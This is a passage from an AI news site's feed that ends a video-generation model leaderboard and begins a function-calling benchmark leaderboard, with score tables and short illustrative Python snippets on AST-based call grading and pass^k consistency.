<hr>
<h2 id="open-source-vbench-rankings">Open-Source VBench Rankings</h2>
<p>The VBench leaderboard tracks 50+ text-to-video models. These are the notable open-source entries by overall score:</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th>Developer</th>
          <th>VBench Total (%)</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Wan 2.2</td>
          <td>Alibaba Cloud</td>
          <td>~84.7</td>
          <td>Current open-source leader; trained on 1.5B videos</td>
      </tr>
      <tr>
          <td>Wan 2.1</td>
          <td>Alibaba Cloud</td>
          <td>~83.1</td>
          <td>Previous version; widely deployed in ComfyUI workflows</td>
      </tr>
      <tr>
          <td>HunyuanVideo 1.5</td>
          <td>Tencent</td>
          <td>-</td>
          <td>96.4% visual quality; 68.5% text alignment on sub-metrics</td>
      </tr>
      <tr>
          <td>LTX-2.3</td>
          <td>Lightricks</td>
          <td>-</td>
          <td>Fastest open-source model; optimized for speed</td>
      </tr>
      <tr>
          <td>Mochi 1</td>
          <td>Genmo AI</td>
          <td>-</td>
          <td>10B parameter; Asymmetric Diffusion Transformer architecture</td>
      </tr>
      <tr>
          <td>Open-Sora 2.0</td>
          <td>Various</td>
          <td>-</td>
          <td>11B params; community benchmark scores near HunyuanVideo</td>
      </tr>
  </tbody>
</table>
<p>The Wan series (from Alibaba's open research team, distinct from the HappyHorse product) leads open-source VBench scoring. Wan 2.2 trained on 1.5 billion videos and 10 billion images, and its 84.7% aggregate VBench score is the highest publicly verified number in that tier.</p>
<p>HunyuanVideo 1.5 from Tencent generates at roughly 75 seconds per clip on an RTX 4090 at 480p. Not fast, but more accessible than most proprietary options for developers who want GPU-local generation. LTX-2.3 from Lightricks is the speed pick - it runs notably faster than HunyuanVideo at comparable quality on many prompt types. James covered it when it launched in the <a href="/models/ltx-2-3/">LTX-2.3 model profile</a>.</p>
<p><img src="/images/leaderboards/video-generation-benchmarks-leaderboard-open-source.jpg" alt="VBench open-source model radar chart showing comparison across 16 evaluation dimensions">
<em>VBench radar chart for open-source video generation models. The Wan series consistently leads in temporal consistency and multiple-object tracking.</em>
<small>Source: github.com/Vchitect/VBench</small></p>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="happyhorses-dominance-and-the-access-problem">HappyHorse's Dominance and the Access Problem</h3>
<p>HappyHorse-1.0 is the most technically impressive model on these rankings, and also the least accessible. It appeared without attribution on Artificial Analysis around April 7, climbed to first across both T2V and I2V leaderboards within days, then vanished from the platform before Alibaba confirmed ownership on April 10. The <a href="https://creati.ai/ai-news/2026-04-10/alibaba-reveals-happyhorse-ai-video-model-top-ranked/">Alibaba-HappyHorse announcement</a> acknowledged the product but didn't announce a commercial availability date.</p>
<p>The architecture details leaked via the model's documentation suggest a 40-layer single-stream Self-Attention Transformer without Cross-Attention, running inference in only 8 denoising steps. It's optimized specifically for human-centric video - facial expression, lip sync, body motion - which explains why it scores particularly well on human-heavy preference prompts in the arena. You can read more in the <a href="/news/happyhorse-1-alibaba-video-ai-crown/">news coverage of HappyHorse topping the leaderboard</a>.</p>
<p>The practical question for anyone building a pipeline: right now, HappyHorse isn't something you can reliably call. It is a signal of where Alibaba's video research is, not a product.</p>
<h3 id="soras-exit-and-what-it-means">Sora's Exit and What It Means</h3>
<p>OpenAI shut down the Sora consumer app on March 24, 2026. The API continues until September 24. Download numbers had fallen to roughly 1.1 million by February - a 66% decline from peak - and infrastructure costs were estimated at $15 million per day. The <a href="https://techcrunch.com/2026/03/29/why-openai-really-shut-down-sora/">TechCrunch analysis of the shutdown</a> describes a product that failed commercially while technically competitive. Disney had committed $1 billion to a partnership; that agreement ended when Sora did.</p>
<p>OpenAI has said the research team continues working on &quot;world simulation&quot; for robotics applications. Whether a successor video model appears under a different product structure isn't clear.</p>
<h3 id="seedances-legal-limbo">Seedance's Legal Limbo</h3>
<p>ByteDance's Seedance 2.0 is technically strong - Elo 1,268 for T2V, second only to HappyHorse - but its commercial arc is uncertain. The Motion Picture Association sent a cease-and-desist letter in February 2026 over &quot;unauthorized use of US copyrighted works on a massive scale,&quot; with Disney, Warner Bros., Paramount, Netflix, and Sony joining. SAG-AFTRA cited unauthorized use of member voice and likeness. ByteDance paused the global rollout in March. More context in our <a href="/news/bytedance-seedance-2-hollywood-copyright-war/">Seedance Hollywood copyright coverage</a>.</p>
<p>The model remains accessible in China and through some API providers. For international commercial production use, its legal exposure is a real risk to factor in.</p>
<h3 id="the-t2v-vs-i2v-split">The T2V vs. I2V Split</h3>
<p>Text-to-video and image-to-video are distinct tasks that require different model strengths. T2V demands creative interpretation of prompts and consistent world-building from nothing. I2V demands that the model respect an existing visual starting point - maintain object identity, honor the lighting and composition, produce motion that feels native to the input image.</p>
<p>Kling's performance shows the distinction well. Kling 3.0 ranks 3rd in T2V (Elo 1,247) and 9th in I2V (Elo 1,282 for the same Pro 1080p model). PixVerse V6, which doesn't appear in the T2V top-10, reaches rank 4 in I2V (Elo 1,314). Users building workflows should test both tasks explicitly rather than assuming a single ranking applies to both use cases. Our <a href="/tools/best-ai-video-generators-2026/">best AI video generators guide</a> covers this trade-off in more depth.</p>
<h3 id="vbench-20s-harder-questions">VBench-2.0's Harder Questions</h3>
<p>The original VBench caught consistency, smoothness, and alignment failures that plagued 2024-era models. Most 2026 frontier models clear those thresholds comfortably. VBench-2.0 turns the dial harder by asking whether videos show physically plausible interactions. When a character pours water, does it flow correctly? When two objects collide, does the motion follow conservation laws? When a person walks, do their limbs move in anatomically plausible sequence?</p>
<p>On action faithfulness alone, even leading models score around 50% in the VBench-2.0 paper's initial evaluation. The four models tested in the March 2026 paper - HunyuanVideo, CogVideoX-1.5, Sora 480p, and Kling 1.6 - showed consistent weaknesses in dynamic attribute changes, where most scored between 8% and 29%.</p>
<p>Physics is the next frontier that benchmarks have put numbers to. Expect this to become the primary differentiator in 2027 rankings.</p>
<hr>
<h2 id="practical-guidance">Practical Guidance</h2>
<p><strong>For professional video production (reliably available):</strong> Kling 3.0 Pro at Elo 1,247 T2V is the strongest option with stable API access and no current legal complications. It supports native 4K output, multi-shot scene logic, and subject consistency across cuts - which matters for anything longer than a 5-second clip. Our <a href="/reviews/review-kling-3/">Kling 3.0 review</a> covers hands-on results.</p>
<p><strong>For social media and short-form at low cost:</strong> Hailuo 02 from MiniMax generates at $0.28 per clip, runs fast, and scores well in user preference testing for casual and social video styles. It won't beat Kling on cinematic quality, but for volume generation the cost difference is significant.</p>
<p><strong>For open-source / local deployment:</strong> Wan 2.2 leads VBench with an 84.7% aggregate score and is Apache 2.0 licensed. LTX-2.3 is the speed pick if latency matters more than absolute quality. HunyuanVideo 1.5 runs on an RTX 4090 at consumer GPU prices and performs well on visual quality sub-metrics even if raw VBench totals aren't publicly confirmed.</p>
<p><strong>For image-to-video specifically:</strong> PixVerse V6 (Elo 1,314) outperforms its T2V ranking markedly and is worth testing separately from any T2V benchmarks you're relying on.</p>
<p><strong>For audio-native video:</strong> Seedance 2.0 leads the With Audio I2V category (Elo 1,176) and is accessible through some API providers despite the global rollout pause. SkyReels V4 at Elo 1,087 is a reliable alternative with audio.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="is-sora-still-available-in-april-2026">Is Sora still available in April 2026?</h3>
<p>The Sora app was shut down March 24, 2026. The Sora API continues until September 24, 2026. No successor product has been announced.</p>
<h3 id="what-is-vbench-20-and-how-is-it-different-from-vbench">What is VBench-2.0 and how is it different from VBench?</h3>
<p>VBench tests 16 dimensions covering video quality and text alignment. VBench-2.0 adds 18 fine-grained dimensions testing intrinsic faithfulness - physics plausibility, human motion realism, commonsense causality, and creative composition. Most current models score below 60% on VBench-2.0 physics tasks.</p>
<h3 id="which-video-model-has-the-best-elo-score-right-now">Which video model has the best Elo score right now?</h3>
<p>HappyHorse-1.0 from Alibaba leads both T2V (Elo 1,361 no-audio) and I2V (Elo 1,398 no-audio) on Artificial Analysis as of April 2026, but public API access isn't yet available.</p>
<h3 id="what-is-the-best-video-model-i-can-actually-use-today">What is the best video model I can actually use today?</h3>
<p>For general availability with strong quality, Kling 3.0 Pro (T2V Elo 1,247) or Veo 3 from Google (Elo 1,217) are solid choices. Open-source developers should look at Wan 2.2 or LTX-2.3.</p>
<h3 id="can-i-use-seedance-20">Can I use Seedance 2.0?</h3>
<p>Seedance 2.0 is accessible in China and through some API providers. ByteDance paused the global consumer rollout in March 2026 due to copyright disputes with major Hollywood studios. Commercial use in international markets carries legal uncertainty.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://artificialanalysis.ai/video/leaderboard/text-to-video">Artificial Analysis Text-to-Video Leaderboard</a></li>
<li><a href="https://artificialanalysis.ai/video/leaderboard/image-to-video">Artificial Analysis Image-to-Video Leaderboard</a></li>
<li><a href="https://vchitect.github.io/VBench-project/">VBench Project Page (Vchitect, CVPR 2024)</a></li>
<li><a href="https://github.com/Vchitect/VBench">VBench GitHub Repository</a></li>
<li><a href="https://arxiv.org/abs/2503.21755">VBench-2.0 Paper - arXiv 2503.21755</a></li>
<li><a href="https://techcrunch.com/2026/03/29/why-openai-really-shut-down-sora/">Why OpenAI Really Shut Down Sora - TechCrunch, March 29 2026</a></li>
<li><a href="https://edition.cnn.com/2026/03/24/tech/openai-sora-video-app-shutting-down">Sora Shutdown Coverage - CNN Business, March 24 2026</a></li>
<li><a href="https://www.hollywoodreporter.com/business/digital/openai-shutting-down-sora-ai-video-app-1236546187/">Disney Exits OpenAI Deal After Sora Closure - Hollywood Reporter</a></li>
<li><a href="https://www.hollywoodreporter.com/business/business-news/mpa-cease-and-desist-bytedance-seedance-2-0-1236510957/">MPA Cease-and-Desist to ByteDance Over Seedance 2.0 - Hollywood Reporter</a></li>
<li><a href="https://www.aljazeera.com/news/2026/2/16/bytedance-pledges-fixes-to-seedance-2-0-after-hollywood-copyright-claims">ByteDance Pledges Fixes to Seedance 2.0 After Hollywood Claims - Al Jazeera</a></li>
<li><a href="https://creati.ai/ai-news/2026-04-10/alibaba-reveals-happyhorse-ai-video-model-top-ranked/">Alibaba Reveals HappyHorse AI Video Model - Creati.ai, April 10 2026</a></li>
<li><a href="https://runwayml.com/research/introducing-runway-gen-4.5">Runway Gen-4.5 Introduction - Runway Research</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/video-generation-benchmarks-leaderboard_hu_d057a292f6e95341.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/video-generation-benchmarks-leaderboard_hu_d057a292f6e95341.jpg" width="1200" height="675"/></item><item><title>Function Calling Benchmarks Leaderboard 2026</title><link>https://awesomeagents.ai/leaderboards/function-calling-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 14:06:53 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/function-calling-benchmarks-leaderboard/</guid><description>&lt;p>Function calling is one of the capabilities that matters most for anyone building real AI applications - and it's one of the least straightforward to assess. A model that gets 90% on general reasoning can fall apart the moment you ask it to correctly format a nested JSON payload, choose between two semantically similar tools, or recover gracefully when an API returns an error mid-task.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Function calling is one of the capabilities that matters most for anyone building real AI applications - and it's one of the least straightforward to assess. A model that gets 90% on general reasoning can fall apart the moment you ask it to correctly format a nested JSON payload, choose between two semantically similar tools, or recover gracefully when an API returns an error mid-task.</p>
<p>This leaderboard tracks how the major frontier models actually perform on dedicated function calling and tool-use benchmarks. We cover five distinct evaluations: BFCL v3 (single and multi-turn structured calls), tau-bench (multi-turn tool use in realistic customer service scenarios), ToolBench (multi-step real-world API tasks), FinTrace (long-horizon financial tool calling), and MCP-Bench (agentic tool use via Model Context Protocol). Each captures something the others miss.</p>
<p>If you're coming from our <a href="/leaderboards/agentic-ai-benchmarks-leaderboard/">agentic AI benchmarks leaderboard</a>, the coverage here is more focused: we're looking specifically at the tool-calling layer, not the full agent trajectory.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>GLM 4.5 leads BFCL v3 at 76.7%, ahead of Qwen3 32B (75.7%) - Claude Opus 4 scores a surprisingly low 25.3%</li>
<li>Claude Sonnet 4.5 leads tau-bench with 0.700 on airline tasks and 0.862 on retail - the strongest published multi-turn tool-use scores</li>
<li>GPT-5.2 Thinking hits 98.7% on tau2-bench telecom, though that benchmark's narrow scope inflates the headline number</li>
<li>Budget pick: Qwen3 235B A22B (74.9% BFCL v3) runs open-weight and trades near-frontier scores for zero API costs</li>
</ul>
</div>
<h2 id="the-benchmarks-explained">The Benchmarks Explained</h2>
<p>Before reading the tables, it helps to know what each benchmark actually tests - because the gap between a 76% BFCL score and a 70% tau-bench score isn't just a number difference. They measure different things entirely.</p>
<h3 id="bfcl-v3-berkeley-function-calling-leaderboard">BFCL v3 (Berkeley Function Calling Leaderboard)</h3>
<p>The <a href="https://gorilla.cs.berkeley.edu/leaderboard.html">Berkeley Function Calling Leaderboard</a> from UC Berkeley's Sky Computing Lab is the most widely cited tool-use benchmark. Version 3 added multi-turn interactions on top of the v2 static evaluation. The dataset contains over 2,000 question-function-answer pairs spanning Python, Java, JavaScript, and REST APIs, testing six categories: simple single calls, parallel calls (multiple functions fired simultaneously), multiple function selection, relevance detection (knowing when to refuse a tool call), multi-turn interactions, and multi-step reasoning.</p>
<p>The evaluation method matters here. BFCL uses Abstract Syntax Tree (AST) comparison to check structural correctness of the produced call, not just string matching. That catches paraphrasing games where a model rewrites the function name slightly and a naive eval would still pass it. BFCL v4 has since added web search and memory tasks, but v3 remains the most-assessed version for cross-model comparison. Version 4 scores aren't broadly available yet across 2026 frontier models.</p>
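<p>To see why AST comparison is stricter than string matching, here is a minimal Python sketch of structural call grading. It is not Berkeley's actual harness - just the core idea of comparing parsed structure rather than raw text.</p>
<pre><code class="language-python">import ast

def parse_call(source: str):
    """Parse one function-call expression into (function name, keyword arguments)."""
    node = ast.parse(source, mode="eval").body
    if not isinstance(node, ast.Call):
        raise ValueError("not a function call")
    kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in node.keywords}
    return ast.unparse(node.func), kwargs

def calls_match(predicted: str, expected: str) -> bool:
    """Structurally equal: same function, same arguments, regardless of argument order."""
    return parse_call(predicted) == parse_call(expected)

# Reordered arguments still pass; a renamed function does not.
print(calls_match('get_weather(city="Paris", unit="C")',
                  'get_weather(unit="C", city="Paris")'))   # True
print(calls_match('fetch_weather(city="Paris", unit="C")',
                  'get_weather(city="Paris", unit="C")'))   # False
</code></pre>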
<h3 id="tau-bench-tool-agent-user-interaction">tau-bench (Tool-Agent-User Interaction)</h3>
<p><a href="https://github.com/sierra-research/tau-bench">tau-bench</a> from Sierra Research simulates live customer service scenarios. An AI agent is given a set of API tools and must complete multi-turn conversations with a simulated user - resolving requests like fare changes, return windows, and account modifications while following strict policy guidelines. A pass^k metric measures how consistently the agent succeeds across k repeated runs - the probability that all k attempts succeed, not just the best one. That penalizes brittleness: a model with 80% single-turn accuracy might only complete multi-turn scenarios reliably 50% of the time because errors compound.</p>
<p>There are two primary domains - airline and retail - with a newer telecom variant (tau2-bench) from the same team. Scores across domains aren't directly comparable because task complexity differs, so we report them separately.</p>
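<p>A quick sketch of how a consistency metric like this can be estimated from repeated runs. The combinatorial estimator below is a common choice for &quot;all k sampled runs succeed&quot;; it may not match tau-bench's exact implementation.</p>
<pre><code class="language-python">from math import comb

def pass_hat_k(successes: int, trials: int, k: int) -> float:
    """Estimated probability that k runs, sampled without replacement from the
    observed trials, all succeed - a measure of consistency, not best-case luck."""
    if successes >= k:
        return comb(successes, k) / comb(trials, k)
    return 0.0

# A model that succeeds on 8 of 10 runs looks strong per-run but far less reliable at k=4.
print(pass_hat_k(8, 10, 1))            # 0.8
print(round(pass_hat_k(8, 10, 4), 3))  # 0.333
</code></pre>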
<h3 id="toolbench-and-toolllm">ToolBench and ToolLLM</h3>
<p><a href="https://github.com/OpenBMB/ToolBench">ToolBench</a>, published by Tsinghua's NLP lab and accepted at ICLR 2024, tests models against over 120,000 instruction-API pairs drawn from 16,000+ real-world APIs across 49 categories. It stresses tool generalization: models are assessed on unseen tools, unseen instructions, and unseen API categories to test whether they've truly learned to use APIs or just memorized training examples. The ToolLLM paper describes the fine-tuned model trained on ToolBench data; the benchmark itself runs any model through the same evaluation harness.</p>
<h3 id="fintrace">FinTrace</h3>
<p>Published in April 2026, <a href="https://arxiv.org/abs/2604.10015">FinTrace</a> from Carnegie Mellon and a consortium of financial AI researchers targets a specific failure mode: models that pick the right tool but then fail to use the output correctly. The benchmark contains 800 expert-annotated trajectories across 34 financial task categories, scored across nine metrics along four axes - action correctness, execution efficiency, process quality, and output quality. It's the only benchmark in this roundup that explicitly measures whether the model reasons well about tool outputs, not just whether it invokes the right function.</p>
<h3 id="mcp-bench">MCP-Bench</h3>
<p><a href="https://arxiv.org/abs/2508.20453">MCP-Bench</a> from Accenture Labs connects LLMs to 28 live MCP servers spanning 250 tools across domains including finance, scientific computing, and travel. Accepted to NeurIPS 2025, it tests real multi-hop tool coordination: &quot;book a flight to the cheapest city with a conference this month&quot; requires chaining calendar, flight search, and pricing tools in the correct order. This benchmark is newer and has fewer assessed models than BFCL, but it's the closest thing to a production agentic workload in the published benchmark suite.</p>
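<p>The kind of dependency chain MCP-Bench tests looks roughly like the sketch below: the answer to one tool call determines the arguments of the next. The tool names and toy data are invented for illustration; they are not MCP-Bench's actual servers.</p>
<pre><code class="language-python"># Toy stand-ins for live tool endpoints; names and data are illustrative only.
CONFERENCES = [{"city": "Lisbon", "name": "AgentConf"}, {"city": "Austin", "name": "ToolSummit"}]
FLIGHTS = {"Lisbon": [510, 420], "Austin": [455, 380]}

def list_conferences(month: str) -> list:
    return CONFERENCES                      # hop 1: which cities have a conference this month?

def search_flights(city: str) -> list:
    return FLIGHTS[city]                    # hop 2: what do flights to that city cost?

def cheapest_conference_flight(month: str):
    cities = {c["city"] for c in list_conferences(month)}
    best_fare = {city: min(search_flights(city)) for city in cities}
    return min(best_fare.items(), key=lambda kv: kv[1])   # hop 3: pick the overall minimum

print(cheapest_conference_flight("2026-04"))  # ('Austin', 380)
</code></pre>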
<hr>
<h2 id="bfcl-v3-rankings">BFCL v3 Rankings</h2>
<p>Data from <a href="https://pricepertoken.com/leaderboards/benchmark/bfcl-v3">pricepertoken.com</a>, accessed April 2026. 23 models assessed; average score 55.9.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>BFCL v3 Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>GLM 4.5 Thinking</td>
          <td>Z AI</td>
          <td>76.7%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3 32B Thinking</td>
          <td>Alibaba</td>
          <td>75.7%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3 32B</td>
          <td>Alibaba</td>
          <td>75.7%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Qwen3 Max</td>
          <td>Alibaba</td>
          <td>74.9%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>GLM-4.7-Flash Thinking</td>
          <td>Z AI</td>
          <td>74.6%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>GLM-4.7-Flash</td>
          <td>Z AI</td>
          <td>74.6%</td>
      </tr>
      <tr>
          <td>7</td>
          <td>GLM 4.5 Air</td>
          <td>Z AI</td>
          <td>69.1%</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Nova Pro 1.0</td>
          <td>Amazon</td>
          <td>67.9%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Kimi K2.5 Thinking</td>
          <td>Moonshot AI</td>
          <td>64.5%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Kimi K2.5</td>
          <td>Moonshot AI</td>
          <td>64.5%</td>
      </tr>
      <tr>
          <td>11</td>
          <td>INTELLECT-3</td>
          <td>Prime Intellect</td>
          <td>63.5%</td>
      </tr>
      <tr>
          <td>12</td>
          <td>Llama 4 Scout</td>
          <td>Meta</td>
          <td>55.7%</td>
      </tr>
      <tr>
          <td>13</td>
          <td>Gemini 3 Flash Preview Thinking</td>
          <td>Google</td>
          <td>53.5%</td>
      </tr>
      <tr>
          <td>14</td>
          <td>MiniMax M1</td>
          <td>MiniMax</td>
          <td>47.8%</td>
      </tr>
      <tr>
          <td>15</td>
          <td>Nemotron 3 Nano 30B A3B Thinking</td>
          <td>NVIDIA</td>
          <td>41.6%</td>
      </tr>
      <tr>
          <td>15</td>
          <td>Nemotron 3 Nano 30B A3B</td>
          <td>NVIDIA</td>
          <td>41.6%</td>
      </tr>
      <tr>
          <td>17</td>
          <td>Phi 4</td>
          <td>Microsoft Azure</td>
          <td>40.8%</td>
      </tr>
      <tr>
          <td>18</td>
          <td>Claude Opus 4 Thinking</td>
          <td>Anthropic</td>
          <td>25.3%</td>
      </tr>
      <tr>
          <td>18</td>
          <td>Claude Opus 4</td>
          <td>Anthropic</td>
          <td>25.3%</td>
      </tr>
      <tr>
          <td>18</td>
          <td>Kimi K2 0711</td>
          <td>Moonshot AI</td>
          <td>25.3%</td>
      </tr>
  </tbody>
</table>
<p>The Claude Opus 4 result at 25.3% deserves attention. Anthropic's flagship model, which leads multi-turn agentic benchmarks and beats everyone on tau-bench, scores at the bottom of the BFCL v3 table. That isn't a fluke - it reflects a real tradeoff in how the model handles structured formatting under test conditions. BFCL rewards precise, rigid JSON outputs. Claude tends toward conversational wrapping that can trip up AST parsing even when the underlying tool selection is correct. The discrepancy is a known issue worth understanding before drawing conclusions about real-world usability.</p>
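<p>Using the <code>calls_match</code> sketch from the BFCL explainer above, the failure mode looks like this: the tool choice is correct, but conversational wrapping means the output never parses as a bare call. The model output string below is hypothetical.</p>
<pre><code class="language-python"># Hypothetical model output: correct tool, correct arguments, wrapped in prose.
predicted = 'Sure - I will call get_weather(city="Paris", unit="C") for you now.'
expected = 'get_weather(city="Paris", unit="C")'

try:
    calls_match(predicted, expected)        # from the AST sketch earlier in this article
except (SyntaxError, ValueError) as err:
    print("rejected by structural grading:", type(err).__name__)
</code></pre>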
<p><img src="/images/leaderboards/function-calling-benchmarks-leaderboard-code.jpg" alt="Code on screen representing API function calls and tool schemas">
<em>BFCL uses Abstract Syntax Tree comparison to evaluate function call correctness - catching subtle structural errors that string matching misses.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="tau-bench-rankings">tau-bench Rankings</h2>
<h3 id="airline-domain">Airline Domain</h3>
<p>Data from <a href="https://llm-stats.com/benchmarks/tau-bench-airline">llm-stats.com</a>, accessed April 2026. 23 models assessed; average score 0.495.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Airline Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Sonnet 4.5</td>
          <td>Anthropic</td>
          <td>0.700</td>
      </tr>
      <tr>
          <td>2</td>
          <td>MiniMax M1 80K</td>
          <td>MiniMax</td>
          <td>0.620</td>
      </tr>
      <tr>
          <td>3</td>
          <td>GLM-4.5-Air</td>
          <td>Zhipu AI</td>
          <td>0.608</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GLM-4.5</td>
          <td>Zhipu AI</td>
          <td>0.604</td>
      </tr>
      <tr>
          <td>5</td>
          <td>MiniMax M1 40K</td>
          <td>MiniMax</td>
          <td>0.600</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude Sonnet 4</td>
          <td>Anthropic</td>
          <td>0.600</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Qwen3-Coder 480B A35B</td>
          <td>Alibaba</td>
          <td>0.600</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Claude Opus 4</td>
          <td>Anthropic</td>
          <td>0.596</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Claude 3.7 Sonnet</td>
          <td>Anthropic</td>
          <td>0.584</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Claude Opus 4.1</td>
          <td>Anthropic</td>
          <td>0.560</td>
      </tr>
      <tr>
          <td>11</td>
          <td>o1</td>
          <td>OpenAI</td>
          <td>0.500</td>
      </tr>
      <tr>
          <td>11</td>
          <td>GPT-4.5</td>
          <td>OpenAI</td>
          <td>0.500</td>
      </tr>
      <tr>
          <td>13</td>
          <td>GPT-4.1</td>
          <td>OpenAI</td>
          <td>0.494</td>
      </tr>
      <tr>
          <td>14</td>
          <td>o4-mini</td>
          <td>OpenAI</td>
          <td>0.492</td>
      </tr>
      <tr>
          <td>15</td>
          <td>Qwen3-Next-80B-A3B-Thinking</td>
          <td>Alibaba</td>
          <td>0.490</td>
      </tr>
      <tr>
          <td>16</td>
          <td>Qwen3-235B-A22B-Thinking-2507</td>
          <td>Alibaba</td>
          <td>0.460</td>
      </tr>
      <tr>
          <td>17</td>
          <td>GPT-4o</td>
          <td>OpenAI</td>
          <td>0.428</td>
      </tr>
      <tr>
          <td>18</td>
          <td>GPT-4.1 mini</td>
          <td>OpenAI</td>
          <td>0.360</td>
      </tr>
      <tr>
          <td>19</td>
          <td>GPT-4.1 nano</td>
          <td>OpenAI</td>
          <td>0.140</td>
      </tr>
  </tbody>
</table>
<h3 id="retail-domain">Retail Domain</h3>
<p>Data from <a href="https://llm-stats.com/benchmarks/tau-bench-retail">llm-stats.com</a>, accessed April 2026. 25 models assessed.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Retail Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Sonnet 4.5</td>
          <td>Anthropic</td>
          <td>0.862</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Claude Opus 4.1</td>
          <td>Anthropic</td>
          <td>0.824</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Claude Opus 4</td>
          <td>Anthropic</td>
          <td>0.814</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Claude 3.7 Sonnet</td>
          <td>Anthropic</td>
          <td>0.812</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude Sonnet 4</td>
          <td>Anthropic</td>
          <td>0.805</td>
      </tr>
      <tr>
          <td>6</td>
          <td>GLM-4.5</td>
          <td>Zhipu AI</td>
          <td>0.797</td>
      </tr>
      <tr>
          <td>7</td>
          <td>GLM-4.5-Air</td>
          <td>Zhipu AI</td>
          <td>0.779</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Qwen3-Coder 480B A35B</td>
          <td>Alibaba</td>
          <td>0.775</td>
      </tr>
      <tr>
          <td>9</td>
          <td>o4-mini</td>
          <td>OpenAI</td>
          <td>0.718</td>
      </tr>
      <tr>
          <td>10</td>
          <td>o1</td>
          <td>OpenAI</td>
          <td>0.708</td>
      </tr>
      <tr>
          <td>11</td>
          <td>Qwen3-Next-80B-A3B-Thinking</td>
          <td>Alibaba</td>
          <td>0.696</td>
      </tr>
      <tr>
          <td>12</td>
          <td>Claude 3.5 Sonnet</td>
          <td>Anthropic</td>
          <td>0.692</td>
      </tr>
      <tr>
          <td>13</td>
          <td>GPT-4.5</td>
          <td>OpenAI</td>
          <td>0.684</td>
      </tr>
      <tr>
          <td>14</td>
          <td>GPT-4.1</td>
          <td>OpenAI</td>
          <td>0.680</td>
      </tr>
      <tr>
          <td>15</td>
          <td>GPT-4o</td>
          <td>OpenAI</td>
          <td>0.603</td>
      </tr>
  </tbody>
</table>
<p>The pattern is consistent: Anthropic holds the top five retail positions, with Claude Sonnet 4.5 posting 0.862 - 3.8 percentage points ahead of the next model, Claude Opus 4.1 at 0.824. GLM-4.5 at sixth (0.797) is the first non-Anthropic model, and it scores higher than GPT-4.5 (0.684), which is worth noting for cost-sensitive buyers.</p>
<hr>
<h2 id="tau2-bench-telecom-extended-domain">tau2-bench Telecom (Extended Domain)</h2>
<p>The tau2-bench telecom dataset, tracked at <a href="https://artificialanalysis.ai/evaluations/tau2-bench">artificialanalysis.ai</a>, extends the original benchmark into telecommunications customer service with more complex policy trees. GPT-5.2 Thinking set a high bar at 98.7%, and Z AI's GLM-4.7-Flash has since nudged the reported ceiling slightly higher.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Telecom Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>GLM-4.7-Flash (Reasoning)</td>
          <td>Z AI</td>
          <td>98.8%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>GPT-5.2 Thinking</td>
          <td>OpenAI</td>
          <td>98.7%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>GLM-5V Turbo (Reasoning)</td>
          <td>Z AI</td>
          <td>98.5%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>GLM-5-Turbo</td>
          <td>Z AI</td>
          <td>98.5%</td>
      </tr>
  </tbody>
</table>
<p>One important caveat: these telecom scores look spectacular, but the benchmark's specific policy constraints also make it more susceptible to overfitting. No model scored above 49% when the paper was first published. The rapid climb to 98%+ suggests some combination of genuine capability improvement and possible training data exposure. Treat telecom scores as directionally useful, not as definitive.</p>
<p><img src="/images/leaderboards/function-calling-benchmarks-leaderboard-agents.jpg" alt="A team working on agentic AI workflows and tool orchestration strategy">
<em>Multi-turn tool use benchmarks like tau-bench are harder to game than single-turn evaluations because errors compound across multiple conversation turns.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="fintrace-rankings-financial-tool-calling">FinTrace Rankings (Financial Tool Calling)</h2>
